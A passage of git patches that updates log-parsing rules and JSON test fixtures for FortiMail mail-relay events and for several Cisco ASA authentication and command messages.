+      properties:
+        input_field: original.message
+        output_field: msg
+        pattern: "to=%{DATA:email_to}%{DELIM}(delay=%{DATA:tmp_delay}%{DELIM})?(xdelay=%{DATA:tmp_xdelay}%{DELIM})?(mailer=%{DATA:tmp_mailer}%{DELIM})?(pri=%{NUMBER:tmp_priority_level_msg}%{DELIM})?(relay=%{RELAY_INFO:relay}%{DELIM})?(dsn=%{DATA:tmp_dsn_version}%{DELIM})?stat=%{GREEDYDATA:event_reason}"
+        custom_patterns:
+          DELIM: ', |\s'
+          RELAY_INFO: '(%{HOSTNAME:destination_domain}? \[%{IP:_destination_ip}\])|(\[%{IP:_destination_ip}\] \[%{IP:_destination_ip2}\])'
+
   - name: parsed_msg
     external:
       name: grok.match
@@ -61,9 +72,9 @@ pipeline:
       properties:
         input_field: parsed_event.message.msg
         output_field: msg
-        pattern: 'to=%{DATA:email_to}, (delay=%{DATA:tmp_delay}, )?(xdelay=%{DATA:tmp_xdelay}, )?(mailer=%{DATA:tmp_mailer}, )?(pri=%{NUMBER:tmp_priority_level_msg}, )?(relay=%{RELAY_INFO:relay}, )?(dsn=%{DATA:tmp_dsn_version}, )?stat=%{GREEDYDATA:event_reason}'
+        pattern: "to=%{DATA:email_to}, (delay=%{DATA:tmp_delay}, )?(xdelay=%{DATA:tmp_xdelay}, )?(mailer=%{DATA:tmp_mailer}, )?(pri=%{NUMBER:tmp_priority_level_msg}, )?(relay=%{RELAY_INFO:relay}, )?(dsn=%{DATA:tmp_dsn_version}, )?stat=%{GREEDYDATA:event_reason}"
         custom_patterns:
-          RELAY_INFO: '(%{HOSTNAME:destination_domain}? \[%{IP:_destination_ip}\])|(\[%{IP:_destination_ip1}\] \[%{IP:_destination_ip2}\])'
+          RELAY_INFO: '(%{HOSTNAME:destination_domain}? \[%{IP:_destination_ip}\])|(\[%{IP:_destination_ip}\] \[%{IP:_destination_ip2}\])'
     filter: "{{parsed_event.message.get('type') == 'event' and parsed_event.message.get('msg') and 'stat=' in parsed_event.message.get('msg')}}"
 
   - name: parse_webfilter_full_url
@@ -93,6 +104,20 @@ pipeline:
         output_field: msg
         pattern: '%{DATA}\(%{IP:source_ip}\)'
 
+  - name: parse_relay_data
+    external:
+      name: grok.match
+      properties:
+        input_field: parse_event_with_no_stat.msg.relay
+        output_field: msg
+        pattern: "%{RELAY:relay}"
+        custom_patterns:
+          RELAY: "%{RELAY_HOST_AND_IP}|%{RELAY_HOST_ONLY}|%{RELAY_IP_ONLY}"
+          RELAY_HOST_AND_IP: '%{HOSTNAME:destination_domain} \[%{IP:_destination_ip}\]'
+          RELAY_HOST_ONLY: "%{HOSTNAME:destination_domain}"
+          RELAY_IP_ONLY: ' \[%{IP:_destination_ip}\]'
+    filter: "{{parse_event_with_no_stat.get('msg') != None}}"
+
   - name: set_ecs_fields
   - name: finalizer
 
@@ -154,20 +179,39 @@ stages:
           action.properties.xdelay: "{{parse_stat_message.msg.tmp_xdelay or parse_event_with_no_stat.msg.xdelay }}"
 
       - set:
-          action.properties.relay: >
-            {%- set tmp = parse_event_with_no_stat.msg.relay.split(" ") -%}
-            {%- if tmp[0] | length > 0 -%}{{ tmp[0].strip().strip('[]') }}{%- elif tmp[1] | length > 0 -%}{{ tmp[1].strip().strip('[]') }}{%- endif -%}
-        filter: "{{parse_event_with_no_stat.msg.relay | length > 0}}"
+          event.reason: "{{parse_short_event.msg.event_reason}}"
+          email.to.address: "{{parse_short_event.msg.email_to.replace('<', '').replace('>', '')}}"
+          user.email: "{{parse_short_event.msg.email_to.replace('<', '').replace('>', '')}}"
+          action.properties.delay: "{{parse_short_event.msg.tmp_delay}}"
+          action.properties.xdelay: "{{parse_short_event.msg.tmp_xdelay}}"
+          action.properties.mailer: "{{parse_short_event.msg.tmp_mailer}}"
+          action.properties.priority_level_msg: "{{parse_short_event.msg.tmp_priority_level_msg}}"
+          action.properties.relay: "{{parse_short_event.msg._destination_ip}}"
+          action.properties.dsn_version: "{{parse_short_event.msg.tmp_dsn_version}}"
+          destination.domain: "{{parse_short_event.msg.destination_domain}}"
+          destination.address: "{{parse_short_event.msg.destination_domain}}"
+          destination.ip: "{{parse_short_event.msg._destination_ip}}"
+        filter: "{{parse_short_event.get('msg') != None}}"
 
       - set:
           action.properties.relay: >
-            {%- set tmp = parse_stat_message.msg.relay.split(" ") -%}
-            {%- if tmp[0] | length > 0 -%}{{ tmp[0].strip().strip('[]') }}{%- elif tmp[1] | length > 0 -%}{{ tmp[1].strip().strip('[]') }}{%- endif -%}
-        filter: "{{parse_stat_message.msg.relay | length > 0}}"
+            {%- if parse_relay_data.msg.destination_domain | length > 0 -%}{{parse_relay_data.msg.destination_domain}}{%- elif parse_relay_data.msg._destination_ip | length > 0-%}{{parse_relay_data.msg._destination_ip}}{%- endif -%}
+          destination.domain: "{{parse_relay_data.msg.destination_domain}}"
+          destination.address: "{{parse_relay_data.msg.destination_domain}}"
+          destination.ip: "{{parse_relay_data.msg._destination_ip}}"
+        filter: "{{parse_relay_data.msg.relay | length > 0}}"
+
+      - set:
+          action.properties.relay: "{{parse_stat_message.msg._destination_ip}}"
+        filter: "{{parse_stat_message.msg._destination_ip | length > 0}}"
+
+      - set:
+          action.properties.relay: "{{parse_stat_message.msg.destination_domain}}"
+        filter: "{{parse_stat_message.msg.destination_domain | length > 0}}"
 
       - set:
-          source.ip: "{{final.action.properties.relay}}"
-        filter: "{{final.action.properties.relay | is_ipaddress}}"
+          source.ip: "{{parsed_event.message.relay.replace('[', '').replace(']', '')}}"
+        filter: "{{parsed_event.message.get('relay', '') | is_ipaddress}}"
 
       - set:
           source.ip: "{{parse_ui.msg.source_ip}}"
diff --git a/Fortinet/fortimail/tests/encrypt.json b/Fortinet/fortimail/tests/encrypt.json
index 55f517be7..b15fd145d 100644
--- a/Fortinet/fortimail/tests/encrypt.json
+++ b/Fortinet/fortimail/tests/encrypt.json
@@ -23,9 +23,6 @@
         "session_id": "ziuhiohzf"
       }
     },
-    "host": {
-      "name": "abc"
-    },
     "log": {
       "hostname": "abc",
       "level": "information"
diff --git a/Fortinet/fortimail/tests/esmtp.json b/Fortinet/fortimail/tests/esmtp.json
index f4785f088..a6e28d8a2 100644
--- a/Fortinet/fortimail/tests/esmtp.json
+++ b/Fortinet/fortimail/tests/esmtp.json
@@ -4,11 +4,23 @@
   },
   "expected": {
     "message": "to=<jdoe@example.com> delay=00:00:06 xdelay=00:00:06 mailer=esmtp pri=165917 relay= [3.4.5.6] dsn=2.0.0 stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)",
+    "event": {
+      "reason": "Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)"
+    },
     "action": {
       "properties": {
-        "mailer": "esmtp"
+        "delay": "00:00:06",
+        "dsn_version": "2.0.0",
+        "mailer": "esmtp",
+        "priority_level_msg": "165917",
+        "relay": "3.4.5.6",
+        "xdelay": "00:00:06"
       }
     },
+    "destination": {
+      "address": "3.4.5.6",
+      "ip": "3.4.5.6"
+    },
     "email": {
       "to": {
         "address": [
@@ -24,9 +36,8 @@
         "3.4.5.6"
       ]
     },
-    "source": {
-      "address": "3.4.5.6",
-      "ip": "3.4.5.6"
+    "user": {
+      "email": "jdoe@example.com"
     }
   }
 }
\ No newline at end of file
diff --git a/Fortinet/fortimail/tests/event.json b/Fortinet/fortimail/tests/event.json
index 92ec21524..8128ab855 100644
--- a/Fortinet/fortimail/tests/event.json
+++ b/Fortinet/fortimail/tests/event.json
@@ -31,6 +31,11 @@
         "user_identifier": "mail"
       }
     },
+    "destination": {
+      "address": "notifications",
+      "domain": "notifications",
+      "ip": "1.1.1.1"
+    },
     "email": {
       "from": {
         "address": [
@@ -41,9 +46,6 @@
     "file": {
       "size": 26135
     },
-    "host": {
-      "name": "hostname"
-    },
     "log": {
       "hostname": "hostname",
       "level": "information"
@@ -52,6 +54,12 @@
       "protocol": "ESMTP"
     },
     "related": {
+      "hosts": [
+        "notifications"
+      ],
+      "ip": [
+        "1.1.1.1"
+      ],
       "user": [
         "mail"
       ]
diff --git a/Fortinet/fortimail/tests/event_smpt_to_1.json b/Fortinet/fortimail/tests/event_smpt_to_1.json
index 5b6521b6b..a1375648e 100644
--- a/Fortinet/fortimail/tests/event_smpt_to_1.json
+++ b/Fortinet/fortimail/tests/event_smpt_to_1.json
@@ -20,6 +20,7 @@
         "log_id": "0003007072",
         "mailer": "esmtp",
         "priority_level_msg": "165917",
+        "relay": "188.165.36.237",
         "session_id": "13KGXMHI007058-13KGXMHK007058",
         "user_identifier": "mail",
         "xdelay": "00:00:06"
diff --git a/Fortinet/fortimail/tests/event_smpt_to_2.json b/Fortinet/fortimail/tests/event_smpt_to_2.json
index 87ec664e1..a3d34d898 100644
--- a/Fortinet/fortimail/tests/event_smpt_to_2.json
+++ b/Fortinet/fortimail/tests/event_smpt_to_2.json
@@ -20,6 +20,7 @@
         "log_id": "0003007072",
         "mailer": "esmtp",
         "priority_level_msg": "165917",
+        "relay": "smtp.example.org",
         "session_id": "13KGXMHI007058-13KGXMHK007058",
         "user_identifier": "mail",
         "xdelay": "00:00:06"
diff --git a/Fortinet/fortimail/tests/event_smtp_STARTTLS.json b/Fortinet/fortimail/tests/event_smtp_STARTTLS.json
index 699fc2d16..572980f42 100644
--- a/Fortinet/fortimail/tests/event_smtp_STARTTLS.json
+++ b/Fortinet/fortimail/tests/event_smtp_STARTTLS.json
@@ -30,14 +30,22 @@
         "verify": "NO"
       }
     },
-    "host": {
-      "name": "123"
+    "destination": {
+      "address": "something.com",
+      "domain": "something.com",
+      "ip": "1.1.1.1"
     },
     "log": {
       "hostname": "123",
       "level": "information"
     },
     "related": {
+      "hosts": [
+        "something.com"
+      ],
+      "ip": [
+        "1.1.1.1"
+      ],
       "user": [
         "mail"
       ]
diff --git a/Fortinet/fortimail/tests/event_smtp_to.json b/Fortinet/fortimail/tests/event_smtp_to.json
index 5a378f013..1a399902a 100644
--- a/Fortinet/fortimail/tests/event_smtp_to.json
+++ b/Fortinet/fortimail/tests/event_smtp_to.json
@@ -27,6 +27,7 @@
         "log_id": "0003007072",
         "mailer": "esmtp",
         "priority_level_msg": "50733",
+        "relay": "email.fr.",
         "session_id": "13KGXMHI007058-13KGXMHK007058",
         "user_identifier": "mail",
         "xdelay": "00:00:12"
@@ -45,9 +46,6 @@
         ]
       }
     },
-    "host": {
-      "name": "1234"
-    },
     "log": {
       "hostname": "1234",
       "level": "information"
diff --git a/Fortinet/fortimail/tests/event_smtp_to_bis.json b/Fortinet/fortimail/tests/event_smtp_to_bis.json
index 867dc06fb..cd5dfc0a6 100644
--- a/Fortinet/fortimail/tests/event_smtp_to_bis.json
+++ b/Fortinet/fortimail/tests/event_smtp_to_bis.json
@@ -27,6 +27,7 @@
         "log_id": "0003014581",
         "mailer": "esmtp",
         "priority_level_msg": "40733",
+        "relay": "mail.eu.",
         "session_id": "13RDCREi014579-13RDCREj014579",
         "user_identifier": "mail",
         "xdelay": "00:00:01"
@@ -45,9 +46,6 @@
         ]
       }
     },
-    "host": {
-      "name": "1234"
-    },
     "log": {
       "hostname": "1234",
       "level": "information"
diff --git a/Fortinet/fortimail/tests/kevent.json b/Fortinet/fortimail/tests/kevent.json
index db597d152..a623e71c7 100644
--- a/Fortinet/fortimail/tests/kevent.json
+++ b/Fortinet/fortimail/tests/kevent.json
@@ -23,9 +23,6 @@
         "log_id": "123"
       }
     },
-    "host": {
-      "name": "hostname"
-    },
     "log": {
       "hostname": "hostname",
       "level": "information"
diff --git a/Fortinet/fortimail/tests/relay_ip_only.json b/Fortinet/fortimail/tests/relay_ip_only.json
new file mode 100644
index 000000000..9e19ae40a
--- /dev/null
+++ b/Fortinet/fortimail/tests/relay_ip_only.json
@@ -0,0 +1,64 @@
+{
+  "input": {
+    "message": "time=15:03:24.344 device_id=FFFF log_id=YY type=event subtype=smtp pri=information  user=mail ui=mail action=NONE status=N/A session_id=\"AAA-BBB\" msg=\"to=<johndoe>, delay=00:00:01, xdelay=00:00:01, mailer=esmtp, pri=2290731, relay= [1.2.3.4], dsn=2.0.0, stat=Sent (ok:  Message 88943067 accepted)\"",
+    "event": {
+      "created": "2021-04-23T20:02:05.017771Z",
+      "id": "123"
+    },
+    "log": {
+      "hostname": "abc"
+    }
+  },
+  "expected": {
+    "message": "time=15:03:24.344 device_id=FFFF log_id=YY type=event subtype=smtp pri=information  user=mail ui=mail action=NONE status=N/A session_id=\"AAA-BBB\" msg=\"to=<johndoe>, delay=00:00:01, xdelay=00:00:01, mailer=esmtp, pri=2290731, relay= [1.2.3.4], dsn=2.0.0, stat=Sent (ok:  Message 88943067 accepted)\"",
+    "event": {
+      "action": "NONE",
+      "category": "smtp",
+      "kind": "event",
+      "message": "to=<johndoe>, delay=00:00:01, xdelay=00:00:01, mailer=esmtp, pri=2290731, relay= [1.2.3.4], dsn=2.0.0, stat=Sent (ok:  Message 88943067 accepted)",
+      "reason": "Sent (ok:  Message 88943067 accepted)"
+    },
+    "action": {
+      "outcome_reason": "to=<johndoe>, delay=00:00:01, xdelay=00:00:01, mailer=esmtp, pri=2290731, relay= [1.2.3.4], dsn=2.0.0, stat=Sent (ok:  Message 88943067 accepted)",
+      "properties": {
+        "delay": "00:00:01",
+        "device_id": "FFFF",
+        "dsn_version": "2.0.0",
+        "log_id": "YY",
+        "mailer": "esmtp",
+        "priority_level_msg": "2290731",
+        "relay": "1.2.3.4",
+        "session_id": "AAA-BBB",
+        "user_identifier": "mail",
+        "xdelay": "00:00:01"
+      }
+    },
+    "destination": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "email": {
+      "to": {
+        "address": [
+          "johndoe"
+        ]
+      }
+    },
+    "log": {
+      "hostname": "abc",
+      "level": "information"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "mail"
+      ]
+    },
+    "user": {
+      "email": "johndoe",
+      "name": "mail"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Fortinet/fortimail/tests/short_event.json b/Fortinet/fortimail/tests/short_event.json
new file mode 100644
index 000000000..c44f8b41d
--- /dev/null
+++ b/Fortinet/fortimail/tests/short_event.json
@@ -0,0 +1,51 @@
+{
+  "input": {
+    "message": "to=<john.doe@example.com>, delay=00:00:00, xdelay=00:00:00, mailer=esmtp, pri=138084, relay=[1.2.3.4] [1.2.3.4], dsn=2.0.0, stat=Sent (<contact@example.com> [InternalId=123456789, Hostname=example] 20226 bytes in 0.127, 154,320 KB/sec Queued mail for delivery)",
+    "event": {
+      "created": "2021-04-23T20:02:05.017771Z",
+      "id": "123"
+    },
+    "log": {
+      "hostname": "abc"
+    }
+  },
+  "expected": {
+    "message": "to=<john.doe@example.com>, delay=00:00:00, xdelay=00:00:00, mailer=esmtp, pri=138084, relay=[1.2.3.4] [1.2.3.4], dsn=2.0.0, stat=Sent (<contact@example.com> [InternalId=123456789, Hostname=example] 20226 bytes in 0.127, 154,320 KB/sec Queued mail for delivery)",
+    "event": {
+      "reason": "Sent (<contact@example.com> [InternalId=123456789, Hostname=example] 20226 bytes in 0.127, 154,320 KB/sec Queued mail for delivery)"
+    },
+    "action": {
+      "properties": {
+        "delay": "00:00:00",
+        "dsn_version": "2.0.0",
+        "mailer": "esmtp",
+        "priority_level_msg": "138084",
+        "relay": "1.2.3.4",
+        "xdelay": "00:00:00"
+      }
+    },
+    "destination": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "email": {
+      "to": {
+        "address": [
+          "john.doe@example.com,"
+        ]
+      }
+    },
+    "log": {
+      "hostname": "abc",
+      "level": "138084,"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "user": {
+      "email": "john.doe@example.com"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Fortinet/fortimail/tests/smtp_event_STARTTLS_client_local_certificate.json b/Fortinet/fortimail/tests/smtp_event_STARTTLS_client_local_certificate.json
index 1c89334d7..9a2659f4d 100644
--- a/Fortinet/fortimail/tests/smtp_event_STARTTLS_client_local_certificate.json
+++ b/Fortinet/fortimail/tests/smtp_event_STARTTLS_client_local_certificate.json
@@ -28,9 +28,6 @@
         "user_identifier": "mail"
       }
     },
-    "host": {
-      "name": "hostname"
-    },
     "log": {
       "hostname": "hostname",
       "level": "information"
diff --git a/Fortinet/fortimail/tests/smtp_event_STARTTLS_server_local_certificate.json b/Fortinet/fortimail/tests/smtp_event_STARTTLS_server_local_certificate.json
index 0da4d56d5..70415b73c 100644
--- a/Fortinet/fortimail/tests/smtp_event_STARTTLS_server_local_certificate.json
+++ b/Fortinet/fortimail/tests/smtp_event_STARTTLS_server_local_certificate.json
@@ -28,9 +28,6 @@
         "user_identifier": "mail"
       }
     },
-    "host": {
-      "name": "ABC"
-    },
     "log": {
       "hostname": "ABC",
       "level": "information"
diff --git a/Fortinet/fortimail/tests/smtp_event_STARTTLS_server_signed_certificate.json b/Fortinet/fortimail/tests/smtp_event_STARTTLS_server_signed_certificate.json
index 9f137120f..ea4d6f21f 100644
--- a/Fortinet/fortimail/tests/smtp_event_STARTTLS_server_signed_certificate.json
+++ b/Fortinet/fortimail/tests/smtp_event_STARTTLS_server_signed_certificate.json
@@ -28,9 +28,6 @@
         "user_identifier": "mail"
       }
     },
-    "host": {
-      "name": "hostname"
-    },
     "log": {
       "hostname": "hostname",
       "level": "information"
diff --git a/Fortinet/fortimail/tests/smtp_event_to_user_unknown.json b/Fortinet/fortimail/tests/smtp_event_to_user_unknown.json
index b338e25d9..a097c6a8f 100644
--- a/Fortinet/fortimail/tests/smtp_event_to_user_unknown.json
+++ b/Fortinet/fortimail/tests/smtp_event_to_user_unknown.json
@@ -38,9 +38,6 @@
         ]
       }
     },
-    "host": {
-      "name": "00000"
-    },
     "log": {
       "hostname": "00000",
       "level": "information"
diff --git a/Fortinet/fortimail/tests/spam.json b/Fortinet/fortimail/tests/spam.json
index 9fa8fb568..74f0940df 100644
--- a/Fortinet/fortimail/tests/spam.json
+++ b/Fortinet/fortimail/tests/spam.json
@@ -41,9 +41,6 @@
       "name": "icon_deleteall.png",
       "type": "file"
     },
-    "host": {
-      "name": "hostname"
-    },
     "log": {
       "hostname": "hostname",
       "level": "information"
diff --git a/Fortinet/fortimail/tests/spam_antispam_url.json b/Fortinet/fortimail/tests/spam_antispam_url.json
index 635e3d904..341f0de9d 100644
--- a/Fortinet/fortimail/tests/spam_antispam_url.json
+++ b/Fortinet/fortimail/tests/spam_antispam_url.json
@@ -41,9 +41,6 @@
         ]
       }
     },
-    "host": {
-      "name": "abc"
-    },
     "log": {
       "hostname": "abc",
       "level": "information"
diff --git a/Fortinet/fortimail/tests/spam_antivirus.json b/Fortinet/fortimail/tests/spam_antivirus.json
index 0506c70c8..288c1147a 100644
--- a/Fortinet/fortimail/tests/spam_antivirus.json
+++ b/Fortinet/fortimail/tests/spam_antivirus.json
@@ -49,9 +49,6 @@
       "name": "file.ppt",
       "type": "file"
     },
-    "host": {
-      "name": "abc"
-    },
     "log": {
       "hostname": "abc",
       "level": "information"
diff --git a/Fortinet/fortimail/tests/spam_webfilter_url.json b/Fortinet/fortimail/tests/spam_webfilter_url.json
index ebb7f0266..2eb7a2eee 100644
--- a/Fortinet/fortimail/tests/spam_webfilter_url.json
+++ b/Fortinet/fortimail/tests/spam_webfilter_url.json
@@ -43,9 +43,6 @@
         ]
       }
     },
-    "host": {
-      "name": "12345"
-    },
     "log": {
       "hostname": "12345",
       "level": "information"
diff --git a/Fortinet/fortimail/tests/spam_webfilter_url_1.json b/Fortinet/fortimail/tests/spam_webfilter_url_1.json
index fda23bcf5..8a5e42a58 100644
--- a/Fortinet/fortimail/tests/spam_webfilter_url_1.json
+++ b/Fortinet/fortimail/tests/spam_webfilter_url_1.json
@@ -41,9 +41,6 @@
         ]
       }
     },
-    "host": {
-      "name": "12345"
-    },
     "log": {
       "hostname": "12345",
       "level": "information"
diff --git a/Fortinet/fortimail/tests/statistics.json b/Fortinet/fortimail/tests/statistics.json
index 0b4060b2c..facd562a8 100644
--- a/Fortinet/fortimail/tests/statistics.json
+++ b/Fortinet/fortimail/tests/statistics.json
@@ -46,9 +46,6 @@
         ]
       }
     },
-    "host": {
-      "name": "B96f1GJTxDUKbh2l"
-    },
     "http": {
       "request": {
         "bytes": 112389
diff --git a/Fortinet/fortimail/tests/virus.json b/Fortinet/fortimail/tests/virus.json
index fd3309163..dcfb05fca 100644
--- a/Fortinet/fortimail/tests/virus.json
+++ b/Fortinet/fortimail/tests/virus.json
@@ -32,9 +32,6 @@
       "name": "file.pdf",
       "type": "file"
     },
-    "host": {
-      "name": "hostname"
-    },
     "log": {
       "hostname": "hostname",
       "level": "information"
diff --git a/Fortinet/fortimail/tests/virus_1.json b/Fortinet/fortimail/tests/virus_1.json
index ebd2ef853..2d26abe84 100644
--- a/Fortinet/fortimail/tests/virus_1.json
+++ b/Fortinet/fortimail/tests/virus_1.json
@@ -24,9 +24,6 @@
         "session_id": "15N7xWCW025167-15N7xWCX025167"
       }
     },
-    "host": {
-      "name": "hostname"
-    },
     "log": {
       "hostname": "hostname",
       "level": "information"

From d5a9a59e903511c7038780b925c5d0c1c47425d5 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Thu, 12 Sep 2024 09:57:15 +0300
Subject: [PATCH 012/317] Fix: Cisco secure firewall new events

---
 Cisco/cisco-secure-firewall/ingest/parser.yml | 22 +++++++++-
 .../tests/test_ASA_111008.json                | 30 ++++++++++++++
 .../tests/test_ASA_113012.json                | 33 +++++++++++++++
 .../tests/test_ASA_611101.json                | 41 +++++++++++++++++++
 .../tests/test_ASA_611103.json                | 34 +++++++++++++++
 5 files changed, 158 insertions(+), 2 deletions(-)
 create mode 100644 Cisco/cisco-secure-firewall/tests/test_ASA_111008.json
 create mode 100644 Cisco/cisco-secure-firewall/tests/test_ASA_113012.json
 create mode 100644 Cisco/cisco-secure-firewall/tests/test_ASA_611101.json
 create mode 100644 Cisco/cisco-secure-firewall/tests/test_ASA_611103.json

diff --git a/Cisco/cisco-secure-firewall/ingest/parser.yml b/Cisco/cisco-secure-firewall/ingest/parser.yml
index f47e3a550..a89263732 100644
--- a/Cisco/cisco-secure-firewall/ingest/parser.yml
+++ b/Cisco/cisco-secure-firewall/ingest/parser.yml
@@ -58,6 +58,8 @@ pipeline:
           "110002": "%{CISCO_110002}"
           "110003": "%{CISCO_110003}"
           "111007": "%{CISCO_111007}"
+          "111008": "%{CISCO_111008}"
+          "113012": "%{CISCO_113012}"
           "113004": "%{CISCO_113004}"
           "199019": "%{CISCO_199019}"
           "302013": "%{CISCO_302013_302014_302015_302016}"
@@ -82,6 +84,8 @@ pipeline:
           "602304": "%{CISCO_602303_602304}"
           "609001": "%{CISCO_609001_609002}"
           "609002": "%{CISCO_609001_609002}"
+          "611101": "%{CISCO_611101}"
+          "611103": "%{CISCO_611103}"
           "710001": "%{CISCO_710001_710002_710003_710005_710006}"
           "710002": "%{CISCO_710001_710002_710003_710005_710006}"
           "710003": "%{CISCO_710001_710002_710003_710005_710006}"
@@ -119,7 +123,9 @@ pipeline:
           CISCO_110002: "%{CISCO_REASON:action_name} for %{DATA:network_transport} from %{DATA:source_address}:%{IP:source_ip}/%{INT:source_port} to %{IP:destination_ip}/%{INT:destination_port}"
           CISCO_110003: '%{GREEDYDATA:action_name} from %{WORD}\:%{IP:source_ip}\/([1-2]?[0-9]|3[0-2]) to %{WORD}\:%{IP:destination_ip}\/([1-2]?[0-9]|3[0-2])(, %{GREEDYDATA:action_outcome_reason})?'
           CISCO_111007: '%{GREEDYDATA:action_name}: %{IP:source_ip} reading from %{NOTSPACE:network_transport} \[%{DATA:http_method}\]'
+          CISCO_111008: "User '%{DATA:user_name}' executed the '%{GREEDYDATA:action_name}' command"
           CISCO_113004: "%{GREEDYDATA} user authentication %{WORD} : server = (\\s*)?%{IP:destination_ip} : user = %{DATA:user_name}"
+          CISCO_113012: "%{GREEDYDATA} user authentication %{WORD} : local database : user = %{DATA:user_name}"
           CISCO_199019: '%{GREEDYDATA} %{DURATION} %{WORD:process_name}\[%{GREEDYDATA:process_id}\]: %{WORD:log_host} %{GREEDYDATA:result}'
           CISCO_302013_302014_302015_302016: '%{CISCO_ACTION:action_name}(?: %{CISCO_DIRECTION:network_direction})? %{DATA:network_transport} connection %{INT} for %{DATA:source_address}:%{IP:source_ip}/%{INT:source_port}( \(%{IP:source_nat_ip}/%{INT:source_nat_port}\))?(\(%{DATA}\))? to %{DATA:destination_address}:%{IP:destination_ip}/%{INT:destination_port}( \(%{IP:destination_nat_ip}/%{INT:destination_nat_port}\))?(\(%{DATA}\))?( duration %{DATA:network_duration} bytes %{INT:network_bytes})?%{DATA}( \(%{DATA:user_name}\))?'
           CISCO_302020_302021: '%{CISCO_ACTION:action_name}(?: %{CISCO_DIRECTION:network_direction})? %{DATA:network_transport} connection for faddr %{IP:source_ip}/%{INT:source_port}(\(%{DATA:user_group}\\%{DATA}\))? gaddr %{IP}/%{INT} laddr %{IP:destination_ip}/%{INT:destination_port}( \(%{DATA:user_name}\))?( type %{INT:icmp_type} code %{INT:icmp_code})?%{DATA}'
@@ -136,6 +142,8 @@ pipeline:
           CISCO_500004: "%{CISCO_REASON:action_name} for protocol=%{DATA:network_transport}, from %{IP:source_ip}/%{INT:source_port} to %{IP:destination_ip}/%{INT:destination_port}"
           CISCO_602303_602304: '%{DATA:network_transport}: An %{CISCO_DIRECTION:network_direction} %{GREEDYDATA} SA \(SPI= %{DATA}\) between %{IP:source_ip} and %{IP:destination_ip} \(user= %{DATA:user_name}\) has been %{CISCO_ACTION:action_name}'
           CISCO_609001_609002: "%{CISCO_ACTION:action_name} local-host (%{DATA:src_interface_name})?:%{IP:source_ip}( duration %{DURATION:event_duration})?"
+          CISCO_611101: "User authentication %{DATA:action_name}: IP address: %{IP:source_ip}, Uname: %{DATA:user_name}"
+          CISCO_611103: "User %{DATA:action_name}: Uname: %{DATA:user_name}"
           CISCO_710001_710002_710003_710005_710006: "%{DATA:network_transport} (?:request|access) %{CISCO_ACTION:action_name} from %{IP:source_ip}/%{INT:source_port} to %{DATA:destination_address}:%{IP:destination_ip}/%{INT:destination_port}"
           CISCO_713172: 'Group = %{GREEDYDATA}, IP = %{IP:source_ip}, Automatic NAT Detection Status:\s+Remote end\s*%{DATA:is_remote_natted}\s*behind a NAT device\s+This\s+end\s*%{DATA}\s*behind a NAT device'
           CISCO_716058: Group <%{GREEDYDATA:user_group}> User <%{WORD:user_name}> IP <%{IP:source_ip}> %{GREEDYDATA:action_name}\. Waiting to resume.
@@ -168,7 +176,7 @@ pipeline:
 
   - name: set_common_fields
   - name: set_ecs_fields
-    filter: '{{pre_parsing.pre_message.message_number_grok in ["106001","110003", "106006", "106007", "106010", "106012", "106014", "106015", "106021", "106023", "106100", "110002", "111007", "113004", "199019", "302013", "302014", "302015", "302016", "302020", "302021", "304001", "305011", "313001", "313004", "313005", "313008", "305012", "402117", "402119", "419001", "419002", "500004", "602303", "602304", "609001", "609002", "710001", "710002", "710003", "710005", "710006", "716058", "713172", "716059", "722011", "722012", "722022", "722023", "722028", "722032", "722033", "722034", "722037", "725001", "733100", "725002", "725003", "725006", "725007", "737016", "852001"]}}'
+    filter: '{{pre_parsing.pre_message.message_number_grok in ["106001","110003", "106006", "106007", "106010", "106012", "106014", "106015", "106021", "106023", "106100", "110002", "111007", "111008", "113004", "113012", "199019", "302013", "302014", "302015", "302016", "302020", "302021", "304001", "305011", "313001", "313004", "313005", "313008", "305012", "402117", "402119", "419001", "419002", "500004", "602303", "602304", "609001", "609002", "611101", "611103", "710001", "710002", "710003", "710005", "710006", "716058", "713172", "716059", "722011", "722012", "722022", "722023", "722028", "722032", "722033", "722034", "722037", "725001", "733100", "725002", "725003", "725006", "725007", "737016", "852001"]}}'
   - name: set_ecs_fields_from_kv
     filter: '{{pre_parsing.pre_message.message_number_grok in ["430001","430002","430003","430004","430005"]}}'
   - name: set_ecs_fields_from_condition
@@ -389,7 +397,17 @@ stages:
           event.category: ["authentication"]
           event.type: ["start"]
           event.outcome: "success"
-        filter: '{{pre_parsing.pre_message.message_number_grok == "113004"}}'
+        filter: '{{pre_parsing.pre_message.message_number_grok in ["113004", "113012"]}}'
+      - set:
+          event.category: [ "authentication" ]
+          event.type: [ "info" ]
+          event.outcome: "success"
+        filter: '{{pre_parsing.pre_message.message_number_grok in ["611101"]}}'
+      - set:
+          event.category: [ "authentication" ]
+          event.type: [ "end" ]
+          event.outcome: "success"
+        filter: '{{pre_parsing.pre_message.message_number_grok in ["611103"]}}'
       - set:
           network.transport: "{{parsed_event.message.network_transport|lower }}"
         filter: '{{parsed_event.message.get("network_transport") != None}}'
diff --git a/Cisco/cisco-secure-firewall/tests/test_ASA_111008.json b/Cisco/cisco-secure-firewall/tests/test_ASA_111008.json
new file mode 100644
index 000000000..8e823017c
--- /dev/null
+++ b/Cisco/cisco-secure-firewall/tests/test_ASA_111008.json
@@ -0,0 +1,30 @@
+{
+  "input": {
+    "message": "%ASA-5-111008: User 'admintufin' executed the 'login' command"
+  },
+  "expected": {
+    "message": "%ASA-5-111008: User 'admintufin' executed the 'login' command",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "code": "111008"
+    },
+    "action": {
+      "name": "login",
+      "target": "network-traffic"
+    },
+    "observer": {
+      "product": "Adaptive Security Appliance",
+      "vendor": "Cisco"
+    },
+    "related": {
+      "user": [
+        "admintufin"
+      ]
+    },
+    "user": {
+      "name": "admintufin"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Cisco/cisco-secure-firewall/tests/test_ASA_113012.json b/Cisco/cisco-secure-firewall/tests/test_ASA_113012.json
new file mode 100644
